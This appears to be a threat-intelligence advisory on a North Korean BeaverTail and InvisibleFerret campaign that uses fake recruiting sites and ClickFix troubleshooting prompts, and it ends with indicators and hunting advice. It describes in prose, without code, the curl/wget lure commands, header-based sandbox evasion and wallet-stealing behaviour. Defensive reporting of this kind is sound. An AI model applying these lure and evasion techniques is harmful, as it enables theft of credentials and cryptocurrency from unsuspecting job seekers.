Tech Note – BeaverTail variant distributed via malicious repositories and ClickFix lure
17 September 2025 – Oliver Smith, GitLab Threat Intelligence
We have identified infrastructure distributing BeaverTail and InvisibleFerret malware since at least May 2025, operated by North Korean actors tracked as Contagious Interview and Famous Chollima.
The campaign uses ClickFix lures to target marketing and trader roles within cryptocurrency and retail organizations rather than traditional software development roles.Malware is delivered as compiled executables for macOS, Windows, and Linux, diverging from script-based distribution reliant on interpreters.
Activity appears to be in testing, with low static detection rates and minimal evidence of large-scale deployment.
BeaverTail is a JavaScript-based information stealer first documented by Palo Alto Unit 42 in 2023, commonly hidden in fake code repositories or trojanized npm packages to siphon cryptocurrency wallet data and system credentials.
Infections typically download a second-stage Python stealer and RAT dubbed InvisibleFerret. ClickFix is a social engineering technique that tricks targets into executing malicious commands by simulating fake CAPTCHAs or troubleshooting prompts.
While ClickFix attacks were previously used to spread GolangGhost and FlexibleFerret malware in early 2025, this campaign marks the first known use of ClickFix to deliver BeaverTail.
Infection Chain and ClickFix Lure
In late May 2025, operators hosted a fraudulent hiring platform at businesshire[.]top with Vercel credentials from the hireproflix-iauhsmsuv-gabriels-projects-75362d20.vercel.app domain.
The site impersonated web3 organizations recruiting cryptocurrency traders and a US-based e-commerce retailer seeking sales and marketing applicants or investors.
Visitors were prompted to submit personal details, answer text questions, and record a video response. When attempting video recording, users encountered fake camera errors accompanied by dynamic, OS-specific troubleshooting commands.
These commands—curl or wget invocations with custom user-agent headers—download and install a compiled BeaverTail package from nvidiasdk.fly[.]dev. Without the numeric header, a benign decoy payload is returned, thwarting sandbox analysis.
For macOS and Windows, the payload is delivered as executables bundled via pkg or PyInstaller, ensuring operation on systems lacking JavaScript or Python interpreters.
Linux hosts receive a JavaScript BeaverTail via a shell script that installs nvm and executes node with a downloaded script. InvisibleFerret is delivered in Python or as a compiled binary when Python is absent, providing redundancy on non-developer machines.
The variant in this campaign targets only eight browser extensions—down from 22 in prior campaigns—and omits non-Chrome browsers, reducing its code footprint by one-third.
String obfuscation is limited to base64 slicing, instead of heavy javascript-obfuscator techniques.
The Windows build includes routines to extract Python dependencies from a password-protected 7z archive, a method previously unseen in BeaverTail campaigns but common among broader threat actor toolkits.
Header-based payload filtering represents an emerging guardrail in BeaverTail and OtterCookie operations throughout 2025, minimizing threat actor exposure.
Analysis of Vercel variables links the fake hiring site to the GitHub repository RominaMabelRamirez/hflix, with commits by user dmytroviv.
Hard-coded allowlists of IPs—including 188.43.33.250, a Russian TransTelecom address tied to North Korean activity—suggest operator protection measures.
When visitors access the site, it logs IP and geolocation via api.ipify.org and probes for cryptocurrency wallet objects in the browser before exfiltrating any findings.
Assessment and Recommendations
We assess that this campaign remains in a testing phase, given the scarcity of secondary payload sightings and development artifacts such as a preinstall script referencing a nonstandard MY_PASWOR variable.
The shift from software developer targets to marketing and trading roles across cryptocurrency and retail sectors indicates North Korean operators are adapting to broader, less technical audiences.
The use of compiled executables further demonstrates an intent to compromise systems lacking developer tools.
Organizations in retail and cryptocurrency should hunt for anomalous connections to nvidiasdk.fly[.]dev or 172.86.93.139, monitor for unauthorized installer package executions, and investigate suspicious ClickFix-style pop-ups or troubleshooting prompts.
Proactively scanning for the listed allowlist IP addresses in server logs may uncover operator activity. As public awareness of BeaverTail grows, threat actors are likely to refine their tradecraft and expand target profiles.
Continuous monitoring of code repositories and supply chain dependencies remains critical to defend against evolving North Korean malware campaigns.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
Source link
